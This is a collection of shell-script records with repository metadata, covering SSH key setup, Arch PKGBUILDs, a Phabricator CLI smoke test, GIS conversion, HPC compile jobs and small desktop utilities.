|
UTF-8
| 6,649
| 4.3125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Bash script that generates ssh key and upload it to remote server
#
# Copyright 2021 TheArqsz

# sshpass is needed for smooth passing password to ssh commands
# NOTE(review): this check runs unconditionally, so sshpass is required
# even when authenticating with an existing key (--key) instead of -p.
if ! command -v sshpass &> /dev/null
then
    echo "sshpass could not be found"
    echo "Use: sudo apt install sshpass"
    exit 1
fi
# Print the usage/help text for this script on stdout.
help()
{
	cat <<EOF
Usage: ./$(basename "$0") -u USER -p -i IP...
Generate SSH keys and copy them to remote

Mandatory arguments:
 -u, --user Specifies username
 -i, --ip Specifies IP or domain
 -p, --password Prompt for ssh password
 Instead of password, you can use existing SSH key
 --key Specifies existing SSH key

Optional arguments:
 -s, --port Specifies ssh port (default: 22)
 -f, --file Specifies generated ssh key filename (default: current-timestamp_id_rsa)
 -h, --help Displays this help
 -l, --logs Specifies error log file (default: $(basename "$0").log)
 -t, --type Specifies type of a SSH key (default: rsa)
 -b, --bytes Specifies the number of bits in the key to create (default: 4096)
 --no-prune Do not remove generated keys if error occured. Do not remove public key if script finished properly

EOF
}
# Print banner with the name of the script
banner()
{
	cat << EOF
┌─┐┬ ┬┌┬┐┌─┐ ┌─┐┌─┐┬ ┬ ┬┌─┌─┐┬ ┬
├─┤│ │ │ │ │───└─┐└─┐├─┤───├┴┐├┤ └┬┘
┴ ┴└─┘ ┴ └─┘ └─┘└─┘┴ ┴ ┴ ┴└─┘ ┴
EOF
}

# Set global variables and empty error log file
error_log_file=`basename "$0"`.log
echo `date` > $error_log_file
error_log_file=$(realpath $error_log_file)
prune=1                                 # 1 = delete keys on error / pubkey on success
ssh_port=22
ssh_key_type=rsa
ssh_key_bytes=4096
current_timestamp=$(date +"%s")
key_name=${current_timestamp}_id_rsa   # default output filename for ssh-keygen

# Traps
# failure: appends the failing line number and command to the error log.
# Registered on ERR below (no `set -e` here, so execution continues).
failure() {
	local lineno=$1
	local msg=$2
	if [ "$1" != "0" ]; then
		echo " > [`date`] Failed at line $lineno: '$msg'" >> $error_log_file
	fi
}
trap 'failure ${LINENO} "$BASH_COMMAND"' ERR

# cleanup: on clean exit ($? = 0), offer 5 seconds to keep the log,
# then delete it.
cleanup() {
	if [ "$?" = "0" ]; then
		echo "Script finished - cleaning logs"
		read -p "Press CTRL-C to interrupt cleaning or wait 5 sec to continue" -t 5
		echo
		rm $error_log_file 2>/dev/null
	fi
}
trap cleanup EXIT

# ctrl_c: make SIGINT exit with a non-zero status (so cleanup keeps logs).
function ctrl_c() {
	echo
	echo "Interrupting..."
	exit 1
}
trap ctrl_c INT

# Loop that sets arguments for the script
while [ -n "$1" ]; do
	case "$1" in
		-h|--help)
			banner
			help
			exit;;
		-u|--user)
			username=$2
			shift
			;;
		-i|--ip)
			ip=$2
			shift
			;;
		-p|--password)
			# Password is read interactively so it never appears in argv.
			echo "WARNING You will be asked for a password - no ouput will be shown."
			read -s -p "Enter password: " password
			shift 0
			;;
		-s|--port)
			ssh_port=$2
			shift
			;;
		--key)
			existing_key=$2
			shift
			;;
		-f|--file)
			key_name=$2
			shift
			;;
		-l|--logs)
			log_file=$2
			shift
			;;
		-t|--type)
			ssh_key_type=$2
			shift
			;;
		-b|--bytes)
			ssh_key_bytes=$2
			shift
			;;
		--no-prune)
			prune=0
			shift 0
			;;
		*)
			echo "Option '$1' is not recognized"
			echo
			help
			exit 1
			;;
	esac
	shift
done

# Check mandatory arguments
if [ -z "$username" ]; then
	echo "Username cannot be empty - specify username"
	exit 1
fi

if [ -z "$ip" ]; then
	echo "Target cannot be empty - specify IP or domain"
	exit 1
fi

if [ -z "$password" ]; then
	echo "Password is empty - checking if existing key is used"
	if [ -z "$existing_key" ]; then
		echo "SSH key cannot be empty when password is empty - specify SSH key or password"
		exit 1
	fi
fi

# Show banner before the main part of script
banner

# Check if script can connect to ssh server with password
# NOTE(review): sshpass -p exposes the password in the process list while
# the probe runs; $password is also unquoted - spaces would break it.
if [ ! -z "$password" ]; then
	sshpass -p $password ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 $username@$ip -p $ssh_port exit 2>>$error_log_file
elif [ ! -z "$existing_key" ]; then
	ssh -i $existing_key -o StrictHostKeyChecking=no -o ConnectTimeout=5 $username@$ip -p $ssh_port exit 2>>$error_log_file
else
	echo "ERROR"
	exit 1
fi
# $? here is the exit status of the last command run inside the branch
# above, i.e. the ssh/sshpass probe.
if [ $? != "0" ]; then
	echo "Cannot confirm that SSH server is working"
	echo "Check your credentials, port or server status"
	echo "Check logs in $error_log_file"
	exit 1
else
	echo "Connected as $username to ssh://$ip:$ssh_port"
	echo
fi

# Generate SSH keys (no passphrase, comment "<user>-secret_token")
ssh-keygen -q -t $ssh_key_type -b $ssh_key_bytes -N '' -f $key_name -C ${username}-secret_token 2>$error_log_file
if [ $? != "0" ]; then
	echo "Cannot generate SSH keys named $key_name"
	echo "Check logs in $error_log_file"
	if [ $prune = "1" ]; then
		echo "Removing all generated keys"
		rm ${key_name}*
	fi
	exit 1
else
	echo "Generated SSH keys - $key_name and ${key_name}.pub"
	echo
fi

# Copy public key to remote server
if [ ! -z "$password" ]; then
	sshpass -p $password ssh-copy-id -o StrictHostKeyChecking=no -p $ssh_port -i ${key_name} $username@$ip 2>>$error_log_file 1>>$error_log_file
elif [ ! -z "$existing_key" ]; then
	ssh-copy-id -f -o "IdentityFile=$existing_key" -o StrictHostKeyChecking=no -p $ssh_port -i ${key_name} $username@$ip 2>>$error_log_file 1>>$error_log_file
else
	echo "ERROR"
	exit 1
fi
if [ $? != "0" ]; then
	echo "Cannot copy public key ${key_name}.pub"
	echo "Check logs in $error_log_file"
	if [ $prune = "1" ]; then
		echo "Removing all generated keys"
		rm ${key_name}*
	fi
	exit 1
else
	echo "Public key ${key_name}.pub copied successfuly to remote server"
	if [ $prune = "1" ]; then
		echo "Removing public key from local file system"
		rm ${key_name}.pub
	fi
	echo
fi

# Check if SSH keys are properly set (log in using only the new key)
ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 -i $key_name $username@$ip -p $ssh_port exit 2>>$error_log_file
if [ $? != "0" ]; then
	echo "Cannot connect to SSH server"
	echo "Check logs in $error_log_file"
	if [ $prune = "1" ]; then
		echo "Removing all generated keys"
		rm ${key_name}*
	fi
	exit 1
else
	echo "SSH keys are working properly"
	echo
	echo "Your SSH key: "
	echo "	${key_name}"
	echo
	echo "You can log in to you server with:"
	echo "	ssh -p ${ssh_port} -i ${key_name} ${username}@${ip}"
fi
| true
|
154d54df59098a3e8e60c191c7b97f7c3a3f4917
|
Shell
|
fhdk/project-sx
|
/calamares-oem/PKGBUILD
|
UTF-8
| 1,400
| 2.59375
| 3
|
[] |
no_license
|
# Maintainer: Philip Müller <philm@manjaro.org>
# Maintainer: Bernhard Landauer <oberon@manjaro.org>

# PKGBUILD producing two packages from the project-sx git repository:
# the Calamares OEM modules and the SX settings skeleton.

pkgbase=calamares-oem
pkgname=("calamares-oem-modules" "calamares-oem-sx-settings")
pkgver=20180217
pkgrel=1
arch=('any')
_repo=project-sx
_commit=f10c08f0e60ea1564423a1a6fdf833c7db61d582
url="https://github.com/philmmanjaro/$_repo"
license=('GPL3')
makedepends=('git')
source=("git+$url.git" 'cleanupoem.service')
md5sums=('SKIP'
         '89410e5af734c7585b58530cba9d9685')

# pkgver is regenerated from the build date (rolling snapshot versioning).
pkgver() {
  date +%Y%m%d
}

# Installs the Calamares module tree plus the post-install configuration
# files and the OEM cleanup systemd unit.
package_calamares-oem-modules() {
  pkgdesc="Manjaro OEM Modules"
  depends=('calamares' 'calamares-oem-settings')
  install=calamares-oem-modules.install
  cd "${_repo}/${pkgbase}"
  install -d "${pkgdir}"/usr/lib/calamares
  cp -r modules "${pkgdir}"/usr/lib/calamares
  install -Dm644 postinstall-settings/settings.conf "${pkgdir}"/etc/calamares/settings.conf
  install -Dm644 postinstall-settings/welcome.conf "${pkgdir}"/etc/calamares/modules/welcome.conf
  install -Dm644 postinstall-settings/users.conf "${pkgdir}"/etc/calamares/modules/users.conf
  install -Dm644 postinstall-settings/finished.conf "${pkgdir}"/etc/calamares/modules/finished.conf
  install -Dm644 cleanupoem.service "${pkgdir}"/opt/calamares/cleanupoem.service
}

# Installs the /etc/oemskel skeleton; satisfies the generic
# calamares-oem-settings dependency above.
package_calamares-oem-sx-settings() {
  pkgdesc="Manjaro OEM SX-Settings"
  provides=('calamares-oem-settings')
  cd "${_repo}/${pkgbase}"
  install -d "${pkgdir}"/etc
  cp -r oemskel "${pkgdir}"/etc
}
| true
|
df1a8b9bd9ed565053c6abe9c4170a07455b3254
|
Shell
|
20after4/phabricator-tools
|
/testbed/arcyon/exercise_arcyon.sh
|
UTF-8
| 2,906
| 2.84375
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
# Smoke-test every arcyon subcommand against a live Phabricator install:
# create/update revisions, attach diffs, comment, create/update tasks and
# paste. Any failing command aborts the run via the ERR trap.
trap "echo 'FAILED!'; exit 1" ERR
set -x

# cd to the dir of this script, so paths are relative
cd "$(dirname "$0")"

arcyon='../../bin/arcyon'

# Every subcommand must at least print its help without failing.
$arcyon -h
$arcyon comment -h
$arcyon comment-inline -h
$arcyon get-diff -h
$arcyon paste -h
$arcyon query -h
$arcyon raw-diff -h
$arcyon show-config -h
$arcyon update-revision -h
$arcyon task-create -h
$arcyon task-query -h

# Create a revision from diff1 and round-trip an update from diff2.
id="$($arcyon create-revision -t title -p plan --summary ssss -f diff1 --format-id)"
$arcyon get-diff -r $id --ls
$arcyon update-revision $id update -f diff2
$arcyon get-diff -r $id --ls

# The new revision must be visible through the various query orderings.
$arcyon query --format-type ids | grep $id
$arcyon query --ids $id --format-string '$summary' | grep ssss
$arcyon query --format-type ids --order created | grep $id
$arcyon query --format-type ids --order modified | grep $id

# Upload raw diffs and attach them to a second revision by diff id.
diffid="$($arcyon raw-diff diff1)"
diffid2="$($arcyon raw-diff diff2)"
$arcyon get-diff -d $diffid --ls
$arcyon get-diff -d $diffid2 --ls
id2="$($arcyon create-revision -t title2 -p plan --diff-id $diffid --format-id)"
id3=$($arcyon update-revision $id2 update --diff-id $diffid2 --format-id)
$arcyon update-revision $id2 update --diff-id $diffid2 --format-url
$arcyon update-revision $id2 update --diff-id $diffid2 --format-url --ccs phab --reviewers bob

# Updating a revision must return the same revision id it was given.
if [ "$id2" != "$id3" ]; then
    false
fi

$arcyon query --format-type ids | grep $id2

# Comments: plain, inline on both sides of the diff, then submit inlines.
$arcyon comment $id2 -m 'hello there!'
$arcyon comment-inline $id2 --start-line 51 --end-line-offset 0 --filepath 'bin/arcyon' -m 'inline comment!'
$arcyon comment-inline $id2 --start-line 51 --end-line-offset 0 --filepath 'bin/arcyon' -m 'old-side inline comment!' --left-side
$arcyon comment $id2 --attach-inlines

# Maniphest tasks: create, ensure it is the most recent, then update.
taskid=$($arcyon task-create 'exercise task-create' -d 'description' -p wish -o alice --ccs phab bob --format-id)
$arcyon task-query
taskid2=$($arcyon task-query --max-results 1 --format-ids)
if [ "$taskid" != "$taskid2" ]; then
    false
fi
$arcyon task-create 'exercise task-create again'
$arcyon task-update $taskid -m 'just a comment'
$arcyon task-update $taskid -t 'exercise task-update' -d 'new description' -p low -o bob --ccs phab alice -m 'updated loads'

$arcyon paste "test paste" -f diff1

# -----------------------------------------------------------------------------
# Copyright (C) 2013-2015 Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------ END-OF-FILE ----------------------------------
| true
|
39a1c567acd63ced3d762572cdd459186d46bb16
|
Shell
|
bbyun28/openmm-tutorial-msbs
|
/clean.sh
|
UTF-8
| 520
| 3.328125
| 3
|
[
"LicenseRef-scancode-public-domain",
"CC-BY-4.0"
] |
permissive
|
#!/usr/bin/env bash
# Normalize whitespace in markdown files and strip output cells from
# git-tracked notebooks.

# Strip whitespace from markdown files.
# NUL-delimited find/read keeps filenames containing spaces intact
# (the previous `for file in $(find . | grep 'md$')` word-split them).
find . -name '*md' -print0 | while IFS= read -r -d '' file; do
    echo "Cleaning ${file}"
    # Replace tabs with spaces.
    sed -i -e $'s/\t/ /g' "${file}"
    # Drop trailing whitespace.
    sed -i -e $'s/[ \t]\+$//' "${file}"
    # Remove trailing blank lines at end of file.
    sed -i -e :a -e '/^\n*$/{$d;N;ba' -e '}' "${file}"
done

# Remove nbconvert outputs (-f: no error when nothing matches).
rm -f ./*/*.nbconvert.ipynb

# Strip output cells from notebooks tracked by git.
git ls-files -z | while IFS= read -r -d '' file; do
    case "${file}" in
        *ipynb)
            echo "Cleaning ${file}"
            jupyter nbconvert "${file}" --to notebook --inplace --nbformat 4 --ClearOutputPreprocessor.enabled=True
            ;;
    esac
done
| true
|
5d5e5cc82a1939ec1cfbf3a5c6cba5dd8e7af05d
|
Shell
|
fuzzy76/dotfiles
|
/scripts/start.sh
|
UTF-8
| 628
| 3.921875
| 4
|
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
# This file check outs the repository and starts the rest of the installation from inside.

# Check for git command
command -v git >/dev/null 2>&1 || { echo "git missing. Make sure it is available before running." >&2; exit 1; };

# Check for key, generate if missing
# NOTE(review): only checks for the ~/.ssh directory, not for an actual key
# pair; an existing empty ~/.ssh skips key generation.
if [ ! -d "$HOME/.ssh" ]; then
  ssh-keygen -t rsa -b 4096
fi

# If we dont have the dotfiles repo, get it
# (clone uses the SSH remote, so the key above must be registered on GitHub)
if [ ! -d "$HOME/repos/dotfiles" ]; then
  mkdir -p $HOME/repos
  git clone git@github.com:fuzzy76/dotfiles.git $HOME/repos/dotfiles
fi

# Change to dotfiles folder and start installation
cd $HOME/repos/dotfiles || exit;
source scripts/install.sh
| true
|
024fcfdaef9434369c6486af46f57594a1eedadc
|
Shell
|
ducet8/dotfiles
|
/etc/bash.d/duce/batdiff.sh
|
UTF-8
| 190
| 2.59375
| 3
|
[] |
no_license
|
# vim: ft=sh
# 2023.08.14 - ducet8@outlook.com

# batdiff needs BOTH bat and git; skip defining it when either is missing.
# BUG FIX: the old guard `! type -P bat ... && type -P git ...` only bailed
# when bat was missing AND git was present, so with both tools absent the
# broken function was still defined. (This file is meant to be sourced,
# hence `return`.)
if ! type -P bat &>/dev/null || ! type -P git &>/dev/null; then
    return 0
fi

# Show a bat-rendered diff of files changed in the working tree
# (deleted files are excluded via --diff-filter=d).
batdiff() {
    git diff --name-only --diff-filter=d | xargs bat --diff
}
| true
|
48e1c816a5abd18e90eee43db89faf383b50bdee
|
Shell
|
developmentseed/house-gerrymandering-2018
|
/bin/scripts/tiger-to-topojson.sh
|
UTF-8
| 1,105
| 3.109375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Convert a TIGER congressional-district shapefile to a simplified,
# quantized TopoJSON (plus a reference GeoJSON) via ogr2ogr, jq and the
# d3/topojson command-line tools installed under node_modules.

WORK=./bin/data
BIN=./node_modules/.bin
FILE=us_cd115_updated_pa

echo "Converting $WORK/$FILE/$FILE.shp to geojson"
ogr2ogr -f GeoJSON -t_srs crs:84 \
  $WORK/$FILE.json \
  $WORK/$FILE/$FILE.shp

echo "Converting to ndjson"
cat $WORK/$FILE.json | jq -c "." | $BIN/ndjson-split 'd.features' > $WORK/$FILE-nd.json

echo "Filtering properties"
# Keep only state/district fips (plus a combined id) and drop territories
# (state fips > 56).
cat $WORK/$FILE-nd.json \
  | $BIN/ndjson-map 'd.properties = { stateFips: d.properties.STATEFP, fips: d.properties.CD115FP, id: "" + d.properties.STATEFP + d.properties.CD115FP }, d' \
  | $BIN/ndjson-filter '+d.properties.stateFips <= 56' \
  > $WORK/$FILE-filtered-nd.json

echo "Converting to topojson"
# CONSISTENCY FIX: use the $BIN variable like every other tool invocation
# (was a hard-coded ./node_modules/.bin/geo2topo — same resolved path).
$BIN/geo2topo -n districts=$WORK/$FILE-filtered-nd.json > $WORK/$FILE-topo.json

echo "Simplifying and quantizing"
$BIN/toposimplify -S 0.04 -f < $WORK/$FILE-topo.json > $WORK/$FILE-simple-topo.json
$BIN/topoquantize 1e4 < $WORK/$FILE-simple-topo.json > $WORK/$FILE-quantized-topo.json

echo "Creating a reference geojson"
$BIN/topo2geo districts=$WORK/$FILE-geo.json < $WORK/$FILE-quantized-topo.json

echo "Done!"
ls -lah $WORK
| true
|
a5a28875ca5c71bc87b5c95ec6fa28ac55179b68
|
Shell
|
h4g0/esc-trabalhos
|
/assignment1/src/esc-nas/mpi_pbs/compile_mpi.pbs
|
UTF-8
| 1,745
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
#PBS -l nodes=1:ppn=1:r662
#PBS -l walltime=00:20:00
#PBS -V

# PBS job: build the NPB3.3-MPI benchmark suite once for every
# compiler/MPI-stack combination listed in `compilers`, moving each set
# of binaries into a directory named <compiler>.<version>.

module load gcc/5.3.0

cd esc-nas/NPB3.3.1/NPB3.3-MPI

# Each entry is "<module family>,<version>".
compilers=("gnu_mpich_eth,1.2.7" "gnu_mpich2_eth,1.5" "intel_eth,1.6.3" "intel_mpich_eth,1.2.7" "intel_mpich2_eth,1.5" "intel_eth,1.8.2" "gnu_eth,1.8.2" "gnu_eth,1.6.3")

for i in "${compilers[@]}";
do
    IFS=',' read compiler version <<< "$i"
    rm bin/*

    if [[ $compiler = "intel_mpich_eth" ]];
    then
        echo "compiler 1"
        cp config/mpich.def config/make.def
        module load intel/mpich_eth/$version
        source /share/apps/intel/parallel_studio_xe_2019/compilers_and_libraries_2019/linux/bin/compilervars.sh intel64
    elif [[ $compiler = "gnu_mpich_eth" ]];
    then
        echo "compiler 2"
        cp config/mpich.def config/make.def
        module load gnu/mpich_eth/$version
    elif [[ $compiler = "gnu_mpich2_eth" ]];
    then
        echo "compiler 2"
        cp config/mpich.def config/make.def
        module load gnu/mpich2_eth/$version
    elif [[ $compiler = "intel_mpich2_eth" ]];
    then
        echo "compiler 2"
        cp config/mpich.def config/make.def
        module load intel/mpich2_eth/$version
        source /share/apps/intel/parallel_studio_xe_2019/compilers_and_libraries_2019/linux/bin/compilervars.sh intel64
    elif [[ $compiler = "intel_eth" ]];
    then
        echo "compiler 3"
        # BUG FIX: previously `cp config/openmpi.def config/openmpi.def`
        # copied the file onto itself, silently leaving the previous
        # iteration's make.def in effect for OpenMPI builds.
        cp config/openmpi.def config/make.def
        module load intel/openmpi_eth/$version
        source /share/apps/intel/parallel_studio_xe_2019/compilers_and_libraries_2019/linux/bin/compilervars.sh intel64
    elif [[ $compiler = "gnu_eth" ]]
    then
        echo "compiler 4"
        # BUG FIX: same self-copy as above; install openmpi.def as make.def.
        cp config/openmpi.def config/make.def
        module load gnu/openmpi_eth/$version
    fi

    echo $compiler.$version
    rm -r $compiler.$version
    mkdir $compiler.$version

    make clean
    make suite
    mv bin/* $compiler.$version
done
| true
|
dc81436661c9493cf8b19c504a06405341b61903
|
Shell
|
NixOS/nixpkgs-channels
|
/pkgs/development/libraries/science/math/tensorflow/prefetcher.sh
|
UTF-8
| 776
| 3.203125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash

# Fetch each published libtensorflow binary tarball with nix-prefetch-url
# and record its URL and store hash in binary-hashes.nix.

version=1.14.0
hashfile=binary-hashes.nix

rm -f "$hashfile"

# emit: append one line to the generated nix expression.
emit() {
    printf '%s\n' "$1" >> "$hashfile"
}

emit "{"
emit "version = \"$version\";"

for sys in linux darwin; do
    for tfpref in cpu gpu; do
        for platform in x86_64; do
            # No GPU builds are published for darwin.
            if [ "$sys" = "darwin" ] && [ "$tfpref" = "gpu" ]; then
                continue
            fi
            url="https://storage.googleapis.com/tensorflow/libtensorflow/libtensorflow-$tfpref-$sys-$platform-$version.tar.gz"
            hash=$(nix-prefetch-url "$url")
            emit "\"${tfpref}-${sys}-${platform}\" = {"
            emit " url = \"$url\";"
            emit " sha256 = \"$hash\";"
            emit "};"
        done
    done
done

emit "}"
| true
|
24f27fac25985356c67d23ccc55527642c7e3f10
|
Shell
|
tsw1985/CharvaHelloWorld
|
/run/run.sh.backup
|
UTF-8
| 2,239
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/bash
# This script runs the Charva test program (if it is invoked as
# "test.sh swing", then the Swing version of the tutorial application
# is started instead).
# JAVA_HOME must be set to the JDK or JRE installation directory (for example,
# /usr/local/jdk1.4 or /usr/local/jre1.4).
clear

# Charva needs its native terminal library on the loader path.
export LD_LIBRARY_PATH=/home/gabriel/eclipseprojects/CharvaHelloWorld/run

# Uncomment the next line to log keystrokes and mouse-clicks, and
# to debug key-mappings (the logfile in this case is $HOME/script.charva).
TEST_OPTS="-Dcharva.script.record=${HOME}/script.charva"

# Uncomment the following line to play back a script that was previously
# recorded using "charva.script.record".
# This line will cause the script to loop three times, at a speeded-up rate (5 times the speed of the recording).
#TEST_OPTS="-Dcharva.script.playbackFile=${HOME}/script.charva -Dcharva.script.playbackLoops=3 -Dcharva.script.playbackRate=5"

# Uncomment the next line to enable color.
TEST_OPTS="${TEST_OPTS} -Dcharva.color=1"

# Uncomment the following option to test for memory leaks.
#TEST_OPTS="${TEST_OPTS} -Xrunhprof:heap=sites"

# Note that the "-classic" option is no longer supported in JDK1.4,
# but in JDK1.3 and earlier it is useful on Linux because otherwise
# (on Linux kernels before 2.6) each Charva application shows up as
# dozens of processes (one for each thread).
#TEST_OPTS="-classic ${TEST_OPTS}"

# Uncomment the following line if you want to debug the application
# using an IDE such as IntelliJ IDEA (I believe that other IDEs such
# as NetBeans and JBuilder have the same capability).
#TEST_OPTS="${TEST_OPTS} -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=5005"

# Build the application classes and jar in-place before launching.
echo Creating .jar ...
cd ../src/main
javac -cp ".:/home/gabriel/eclipseprojects/CharvaHelloWorld/lib/charva.jar" *.java
jar cvfe program.jar program *.class

${JAVA_HOME}/bin/java \
	${TEST_OPTS} \
	-cp ".:main/:/home/gabriel/eclipseprojects/CharvaHelloWorld/run/commons-logging.jar:/home/gabriel/eclipseprojects/CharvaHelloWorld/run/log4j-1.2.8.jar:/home/gabriel/eclipseprojects/CharvaHelloWorld/src:/home/gabriel/eclipseprojects/CharvaHelloWorld/run/classes" \
	main.Main 2> charva.log

# Restore sane terminal modes after the curses-style UI exits.
stty sane
| true
|
b647c4271decdeee77f632499eab5199eb613cc4
|
Shell
|
rbgarga/my-desktop-config
|
/bin/vol.sh
|
UTF-8
| 649
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/sh
# Volume-control helper built on top of mixer(8) (FreeBSD-style CLI).
# Usage: vol.sh up|down|<0-100>|mute|unmute|toggle|show
echo "$@" >> /tmp/debug   # debug trace of every call; NOTE(review): predictable world-writable path
action=$1
# Current volume level. Assumes `mixer -S vol` prints something like
# "vol:50:50" and that colon-field 2 is the level -- TODO confirm on target OS.
cur_vol=$(mixer -S vol | cut -d: -f2)

# Remember the current volume (unless already muted) so unmute can restore it.
save_vol() {
  if [ "$cur_vol" = "0" ]; then
    return
  fi
  echo "$cur_vol" > /tmp/.saved_vol
}

# Print the previously saved volume, falling back to 50 when nothing was saved.
# NOTE: 'local' is not strictly POSIX but is supported by dash/ash/bash.
restore_vol() {
  local _vol=50
  if [ -f /tmp/.saved_vol ]; then
    _vol=$(cat /tmp/.saved_vol)
  fi
  echo "$_vol"
}

case "$action" in
  up)
    vol="+1"          # relative adjustment understood by mixer
    ;;
  down)
    vol="-1"
    ;;
  [0-9]*)
    vol="$action"     # absolute level
    ;;
  mute)
    save_vol          # stash current level before silencing
    vol="0"
    ;;
  unmute)
    vol=$(restore_vol)
    ;;
  toggle)
    # Re-invoke ourselves so mute/unmute share one code path.
    if [ "$cur_vol" = "0" ]; then
      exec $0 unmute
    else
      exec $0 mute
    fi
    exit 0
    ;;
  show)
    echo "$cur_vol"
    exit 0
    ;;
  *)
    exit 1
esac

# Apply the chosen level; output and errors are deliberately discarded.
mixer vol "$vol" >/dev/null 2>&1
| true
|
b8ae7dd904aef24d0655a2fd79b18f39dfbef556
|
Shell
|
juanka1995/ingenieria_informatica_etsiit
|
/AÑO 1/fundamentos_del_software/Practicas/Sesiones/Sesion 6/Ejercicio 6.2
|
UTF-8
| 765
| 3.953125
| 4
|
[] |
no_license
|
#!/bin/bash
# Lists the direct contents of a directory, classifying each entry as a
# regular file, a directory or a symbolic link.
#
# Usage: script <directorio>

# Prints the classification of every entry directly inside $1.
clasificar_contenido() {
  local dir=$1
  local archivo
  # -mindepth 1 excludes the directory itself. The original
  # `find $1 -maxdepth 1 | grep -v '/$'` only dropped that line when the
  # argument happened to end in '/', because find does not append a slash
  # to directory names.
  while IFS= read -r archivo; do
    # Check -L first: `test -f` follows symlinks, so a link to a regular
    # file would otherwise be (mis)reported as "Fichero regular".
    if [[ -L $archivo ]]; then
      echo "Enlace: $archivo"
    elif [[ -f $archivo ]]; then
      echo "Fichero regular: $archivo"
    elif [[ -d $archivo ]]; then
      echo "Directorio: $archivo"
    fi
  done < <(find "$dir" -mindepth 1 -maxdepth 1)
}

main() {
  # Exactly one argument expected: the directory to inspect.
  if [[ $# -eq 1 ]]; then
    if [[ -d $1 ]]; then
      clasificar_contenido "$1"
    else
      echo "$1 no es un directorio existente"
    fi
  else
    echo "Introduce los parametros correctos"
  fi
}

main "$@"
| true
|
6b5c8ee61f079f0816cf7ec9672577d79923b593
|
Shell
|
zendegani/scripts
|
/old/scripts/0.0_Code&Scripts/s6disp_pre_endmmbr
|
UTF-8
| 893
| 3.171875
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# NOTE: shebang changed from /bin/sh -- the `for (( ... ))` loop below is a
# bashism and fails under strict POSIX sh.
#
# For every numbered subfolder of Q-Al-Mg, generates displaced POSCAR
# supercells with the SPHInX tools (sxstructprint/sxstructrep/sxuniqdispl).
cd Q-Al-Mg || exit 1
#module load sphinx/serial/2.0.4
#run this script in main folder Q-Al-Mg
here=$(pwd)
# Glob instead of parsing `ls -1d [0-9]*`; each match is one calculation dir.
for f in [0-9]*; do
  echo "$f"
  # Guard the cd: without it, every following command (including the mkdirs
  # and mvs) would run in the wrong directory when $f/finite is missing.
  cd "$f/finite" || { echo "skipping $f: no finite/ subdir" >&2; continue; }
  # Take the 28-line header (lattice + positions) of the relaxed structure.
  head -28 relax/CONTCAR > POSCAR
  echo 'convert POSCAR to strcut'
  sxstructprint --vasp -i POSCAR > struct.sx
  echo 'generating supercell'
  sxstructrep -r 1x1x2 -i struct.sx -o Sstruct.sx > sxstructrep.log
  echo 'convert Supercell to POSCAR'
  sx2poscar -i Sstruct.sx -o SPOSCAR > sx2poscar.log
  echo 'generating displacements'
  # displacement amplitude 0.02 -- presumably Angstrom; verify with sxuniqdispl docs
  sxuniqdispl -d 0.02 -i Sstruct.sx > sxuniqdispl.log
  echo 'generating displaced POSCAR'
  # One input-disp-<i>.sx per unique displacement; count them to drive the loop.
  ndir=$(ls -1d i*.* | wc -l)
  for (( i = 1; i <= ndir; i++ )); do
    sx2poscar -i "input-disp-$i.sx" -o "SPOSCAR$i" > sx2poscar.log
    mkdir "1_$i"
    mv "SPOSCAR$i" "1_$i/POSCAR"
  done
  echo 'background'
  # Undisplaced reference cell for the background forces.
  mkdir forces_background
  mv SPOSCAR forces_background/POSCAR
  cd "$here"
done
| true
|
82fb9ade8201ca3a8c70c2cf91d4f3523adef35e
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/psp-sdl_ttf/PKGBUILD
|
UTF-8
| 1,086
| 2.859375
| 3
|
[] |
no_license
|
# Cross-compiles SDL_ttf 2.0.11 for the Sony PSP homebrew toolchain.
pkgname=psp-sdl_ttf
pkgver=2.0.11
pkgrel=1
pkgdesc="A simple library to load ttfs of various formats as SDL surfaces (psp)"
# 'any': the produced artifacts target the PSP, not the build host.
arch=('any')
url="http://www.libsdl.org/projects/SDL_ttf/"
license=('custom')
depends=('psp-sdk' 'psp-sdl' 'psp-freetype2')
makedepends=('psp-gcc' 'psp-pkg-config')
# Keep static libs; host build flags / stripping would corrupt PSP objects.
options=('staticlibs' '!buildflags' '!strip')
source=("http://www.libsdl.org/projects/SDL_ttf/release/SDL_ttf-${pkgver}.tar.gz"
        "SDL_ttf-${pkgver}-PSP.patch")
# NOTE(review): 'SKIP' disables integrity checking; a fixed release tarball
# should carry a real checksum.
md5sums=('SKIP'
         'SKIP')

prepare() {
  cd "$srcdir/SDL_ttf-$pkgver"
  # README.PSP is (re)created by the PSP patch below.
  rm -f README.PSP
  patch -Np1 -i ../SDL_ttf-${pkgver}-PSP.patch
}

build() {
  cd "$srcdir/SDL_ttf-$pkgver"
  sh autogen.sh
  # Link against the PSP SDK's libc / user-mode libraries explicitly.
  export LDFLAGS="-L$(psp-config --pspsdk-path)/lib -L$(psp-config --psp-prefix)/lib -lc -lpspuser"
  export LIBS="-lc -lpspuser"
  mkdir -p build-psp && pushd build-psp
  # Cross-configure: point SDL and freetype at the PSP prefix, no X11.
  ../configure --prefix=/usr/psp --host=psp \
    --with-sdl-prefix=$(psp-config --psp-prefix) --with-freetype-prefix=$(psp-config --psp-prefix) --without-x
  make
}

package() {
  cd "$srcdir/SDL_ttf-$pkgver/build-psp"
  make DESTDIR="$pkgdir" install
}
| true
|
f9d0ec8de313964fdce738a2d55008edb84782a8
|
Shell
|
